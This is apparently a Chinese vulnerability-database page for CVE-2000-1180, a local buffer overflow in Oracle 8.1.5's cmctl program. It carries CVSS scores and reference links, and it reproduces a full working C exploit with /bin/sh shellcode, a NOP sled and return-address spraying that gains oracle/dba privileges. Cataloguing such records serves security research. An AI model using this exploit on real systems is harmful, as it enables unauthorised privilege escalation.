CVE-2000-1180
CVSS4.6
发布时间 :2001-01-09 00:00:00
修订时间 :2016-10-17 22:09:04
NMCOE    

[原文]Buffer overflow in cmctl program in Oracle 8.1.5 Connection Manager Control allows local users to gain privileges via a long command line argument.


[CNNVD]Oracle连接管理控制cmctl程序缓冲区溢出漏洞(CNNVD-200101-050)

        Oracle 8.1.5连接管理控制的cmctl程序存在缓冲区溢出漏洞。本地用户可以借助超长命令行参数提升特权。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1180
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1180
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-050
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=97474521003453&w=2
(UNKNOWN)  BUGTRAQ  20001120 vulnerability in Connection Manager Control binary in Oracle
http://www.securityfocus.com/bid/1968
(VENDOR_ADVISORY)  BID  1968
http://xforce.iss.net/xforce/xfdb/5551
(UNKNOWN)  XF  oracle-cmctl-bo(5551)

- 漏洞信息

Oracle连接管理控制cmctl程序缓冲区溢出漏洞
中危 缓冲区溢出
2001-01-09 00:00:00 2006-11-14 00:00:00
本地  
        Oracle 8.1.5连接管理控制的cmctl程序存在缓冲区溢出漏洞。本地用户可以借助超长命令行参数提升特权。

- 公告与补丁

        

- 漏洞信息 (20411)

Oracle 8.x cmctl Buffer Overflow Vulnerability (EDBID:20411)
linux local
2000-11-20 Verified
0 Anonymous
N/A [点击下载]
source : http://www.securityfocus.com/bid/1968/info

cmctl is the Connection Control Manager, part of the Oracle 8i installation. A vulnerability exists that can allow elevation of privileges.

The problem occurs in the way cmctl handles the user-supplied command line arguments. The string representing argv[1] (the first user-supplied commandline argument) is copied into a buffer of predefined length without being checked to ensure that its length does not exceed the size of the destination buffer. As a result, the excessive data that is written to the buffer will write past its boundaries and overwrite other values on the stack (such as the return address). 

This can lead to the user executing supplied shellcode with the effective privileges of cmctl, egid dba and euid oracle.


/*
Exploit Code for cmctl in Oracle 8.1.5 (8i) for Linux. I tested in RH
6.2
and 6.1. Is possible to export to others platforms.

If someone exports this to Sparc please tell me.

synopsis: buffer overflow in cmctl
Impact:   any user gain euid=oracle and egid=dba.


Dedicated to cmlc guys: juaroflin, oscar, ismak, blas, blackbas and
others.
Thanks for your patience and time.

Special Thanks to my favourite DBA. Xavi "de verdad como sois" Morales.
*/


#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_OFFSET                    1
#define DEFAULT_BUFFER_SIZE             350
#define NOP                            0x90
#define BINARY  "/usr/local/oracle8i/app/oracle/product/8.1.5/bin/cmctl
echo $pakito"


char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

main(int argc, char *argv[]) {
  char *buff, *ptr,*name[3],environ[100],binary[120];
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;


  if (argc > 1) offset  = atoi(argv[1]);
        else
                {
                printf("Use ./cmctl_start Offset\n");
                exit(1);
                }


  buff = malloc(bsize);
  addr = get_sp() - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
setenv("pakito",buff,1);

system(BINARY);
}
		

- 漏洞信息

1653
Oracle cmctl Command Line Argument Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2000-11-20 Unknow
2000-11-20 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站